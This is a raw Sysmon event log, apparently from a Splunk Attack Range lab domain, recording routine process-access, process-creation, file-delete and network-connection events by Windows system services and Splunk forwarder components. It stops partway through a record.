07:58:59.521{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106121Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:59.520{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106120Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:59.520{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106119Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:59.520{58E9C193-ACA4-615A-0500-00000000FC01}412428C:\Windows\system32\csrss.exe{58E9C193-B443-615A-1002-00000000FC01}4344C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000106118Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:59.520{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B443-615A-1002-00000000FC01}4344C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000106117Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:59.520{58E9C193-B443-615A-1002-00000000FC01}4344C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000106116Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:59.078{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=80195766EC128377F85C3E27D74564B2,SHA256=3B6B6101C5D24A05365DC9371B9CCE78E9DD08CD1330693D7E73E426531728A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106115Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:59.077{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AC09D0886A40CA77F2A65626FE5D8192,SHA256=8BF6B76200E29F9953DA3F06D771DBCF6A990E036631A2C65912D08D450D17D1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000082923Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:58.992{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B442-615A-8001-00000000FD01}1140C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082922Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:58.992{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082921Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:58.992{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000082928Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:00.899{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=671CFB1C76B4C27EF02D3DB756E8CB55,SHA256=DCF46C689FC0D904A3C39214F2D881BDA0D0EEF9394B59A57CBFBD1C9DC56D3A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000106143Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:00.983{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACA8-615A-1600-00000000FC01}1284C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106142Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:00.983{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACA8-615A-1600-00000000FC01}1284C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106141Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:00.983{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACA8-615A-1600-00000000FC01}1284C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000106140Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:00.849{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=579A455CF9FD42D9C23AFAC8E85D8528,SHA256=E07BB4BFEDB041984E180AF1F8659B7E5679ED0F6D2473306F1A1F8FD8CC2EAA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000106139Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:00.595{58E9C193-ACA5-615A-0B00-00000000FC01}628836C:\Windows\system32\lsass.exe{58E9C193-AC86-615A-0100-00000000FC01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96ef2|C:\Windows\system32\kerberos.DLL+793e4|C:\Windows\system32\kerberos.DLL+1443f|C:\Windows\system32\lsasrv.dll+2d211|C:\Windows\system32\lsasrv.dll+2b3d4|C:\Windows\system32\lsasrv.dll+30929|C:\Windows\system32\lsasrv.dll+2e287|C:\Windows\system32\lsasrv.dll+2d211|C:\Windows\system32\lsasrv.dll+15ded|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 23542300x8000000000000000106138Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:00.549{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=80195766EC128377F85C3E27D74564B2,SHA256=3B6B6101C5D24A05365DC9371B9CCE78E9DD08CD1330693D7E73E426531728A2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000106137Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:00.480{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B444-615A-1102-00000000FC01}5760C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106136Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:00.478{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106135Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:00.478{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106134Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:00.477{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106133Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:00.477{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106132Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:00.475{58E9C193-ACA4-615A-0500-00000000FC01}412964C:\Windows\system32\csrss.exe{58E9C193-B444-615A-1102-00000000FC01}5760C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000106131Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:00.475{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B444-615A-1102-00000000FC01}5760C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000106130Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:00.334{58E9C193-B444-615A-1102-00000000FC01}5760C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000106129Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:58.307{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local51827-true0:0:0:0:0:0:0:1win-dc-639.attackrange.local389ldap 354300x8000000000000000106128Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:58.307{58E9C193-ACB4-615A-2700-00000000FC01}2920C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local51827-true0:0:0:0:0:0:0:1win-dc-639.attackrange.local389ldap 354300x800000000000000082927Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:56.812{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50127-false10.0.1.12-8000- 23542300x800000000000000082926Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:00.039{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3BAA74D1887E5FBBBAA5BE10F590A851,SHA256=4B4233723ED22061372DBE7FEF6DDFAAD2096DED68629638085D4C1C933B66AE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082925Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:00.039{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A749F7F171D7E28909960D38F486A637,SHA256=FC964D09AC158E646A1D23A429D5849773FE28910072A638A4EABA20C4E3AAEF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082929Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:01.899{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3DB494D27B9E4CAA00F95207EB5C1C01,SHA256=97D9E9FE64771E9D8755EF4FF1DB8EE2724B0A221865D9438568C1E46703B892,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106148Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:01.857{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=63A63B06953A4BB83D1D22AAC10DA579,SHA256=F01BDC58744A65746BCDE1DABE6ABCE8014595559367CB9119EC0ABEF989C8DD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106147Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:01.605{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program 